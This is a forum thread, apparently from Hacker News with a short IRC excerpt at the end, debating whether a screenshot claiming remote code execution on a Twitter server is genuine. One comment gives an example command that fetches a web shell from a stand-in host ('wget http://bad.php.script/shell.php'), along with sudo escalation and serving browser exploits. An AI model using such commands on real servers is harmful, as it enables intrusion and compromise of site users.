It also doesn't look like the standard Linux uptime command, which uses "load average", singular. The BSDs, including OS X, say "load averages"... does Twitter run FreeBSD, or is this copied-and-pasted from an OS X client machine?
I guess it's possible that the URL behind the black bar doesn't match the actual URL used for the exploit - further obscuring. It might be too easily guessable if it's short, no matter the censorship. And editing the URL would make the seal look like the above. Sure, it's fake, but there's a not too unreasonable explanation as to why it might not be fake fake and why he'd have made that mistake and thought it not to be relevant enough (or just didn't notice) for the central authenticity of the claim to be challenged.
It's absolutely possible it's fake. But it's also yet possible that it's not.
The address bar also has focus (blue outline), further suggesting the URL has been edited after a page load. Normally it loses focus as soon as you hit [enter].
Faking it would be much easier and not betray such evidence:
Hit F12, edit out the HTML to be whatever you want.
Everyone is freaking about the "URL edit", but it's probably that it's actually a long string exploit and he's just edited the URL to fit into the screen to take the screenshot.
It's too amateur a fake, so I'm actually leaning on the side of it being real.
It's a standard remote code execution exploit. It's as bad as it gets in security vulnerabilities.
He is running shell commands through the Twitter server - the 'uptime' command is just a demo. He could also access privates files and possibly gain access to secure data that would let him access all data stored on Twitter servers, etc. He could also alter the twitter code to display anything he wanted to twitter users.
I'm not sure about the mechanics of this, but at a minimum the webserver probably has access to the HTTPS private key for the subdomain, or at least has it in memory, since the request is shown to be running over HTTPS.
Reading the memory of another process is not allowed on modern OS for precisely that reason, so this would be another exploit. (http://en.wikipedia.org/wiki/Process_isolation) But the keys are most likely on disk, readable by the server ;).
Also, some setups are not prone to this: Twitter most likely uses an proxy terminating SSL and then forwards the request to a smaller webserver running the app. This one will not hold the keys.
Most larger webservers can also run the app workers with a different user than the webserver itself.
> Reading the memory of another process is not allowed on modern OS for precisely that reason, so this would be another exploit.
both Linux and Windows allow processes to read the memory of other processes running as the same user, via ptrace() and /proc/pid/mem on Linux, and via ReadProcessMemory() on Windows.
Seems that he was able to execute the "uptime" terminal command via that URL, and the output was served as page content. Now imagine what other dangerous terminal commands he could run.
Remote code execution e.g. he can also execute 'wget http://bad.php.script/shell.php' for planting shell or 'sudo <command>' for priviledge execution (up to root). So pretty much everything you can do on their Twitter servers.
Another "fun" thing to do is if the hosted data is just sitting there, wget a browser exploit file on top of it.
This is probably not a serious concern for a place as huge as twitter because they're going to CDN static content separately from dynamic content, but would be really exciting for "I got me one server for my whole startup" types. Maybe you could bypass existing systems to serve up malicious code to end users anyway.
I'm not convinced. Anyone could do this "hack" with MS Paint. If it were real, then surely the proof would manifest with some kind of change of the Twitter interface.
A stupid 1am question: is it common among ops teams to replace these "common" binaries by a honeypot-like wrapper which notifies the security team immediately, just in case of a complete meltdown on the web developer side?
Sorry, I don't have an answer to your question, but in theory, how would it detect an intrusion for automatic notification? It seems to me that detecting a bad operation from a good operation is the same thing as securing the system. A vulnerability would likely sail past any such notification system.
A naive approach could be defining that the software stack to use is under /opt/twitter/ and everything under /usr/bin/ and /bin/ is just a honeypot, so any legitimate developer using those would also trigger a notification. But anyhow, it smells like overkill, the wrong place and not worth the extra mileage. The only case I can think of where this would be useful is when management or timing problems prevent proper and secure development -- which is not a problem ops should solve. Would still be interesting if someone actually does this.
Well, it would shield against simplistic attempts at exploiting setuid binaries, certainly, but beyond that its effectiveness would probably be limited, especially as it became more widely known.
Another interesting strategy, particularly in the age of widespread use of VMs and containers, might be to extend the basic idea of ASLR beyond address space. Randomize paths and filenames and system call numbers, for example. You'd need to build all your binaries yourself, of course, and run scripts through some sort of mangler (for maximum effectiveness, do this per-VM/container). You'd want to encrypt non-user-visible strings, too.
There'd be a lot of tooling work necessary to make this practical in the real world, of course.
I've never heard of anyone actually using it. It would be a huge pain and wreak havoc on sysadmins. Also, really nasty attacks are capable of bringing exploit code with them.
Terms of their bug bounty program just says "You may not publicly disclose the vulnerability prior to our resolution" ... https://hackerone.com/twitter
Probably not; seems to me like a pretty dumb thing to do if he wanted any bounty. The domain is nearly as dangerous as the URL, since it leads attackers directly to the vulnerable server(s).
<__>: the SSL seal is missing
<__>: it's a javascript edit
<__>: open a https site in firefox and look at the addressbar
<__>: sec
<__>: yeah
<__>: it DOESN'T appear if you used a javascript hack to make it go away
<__>: and changed the page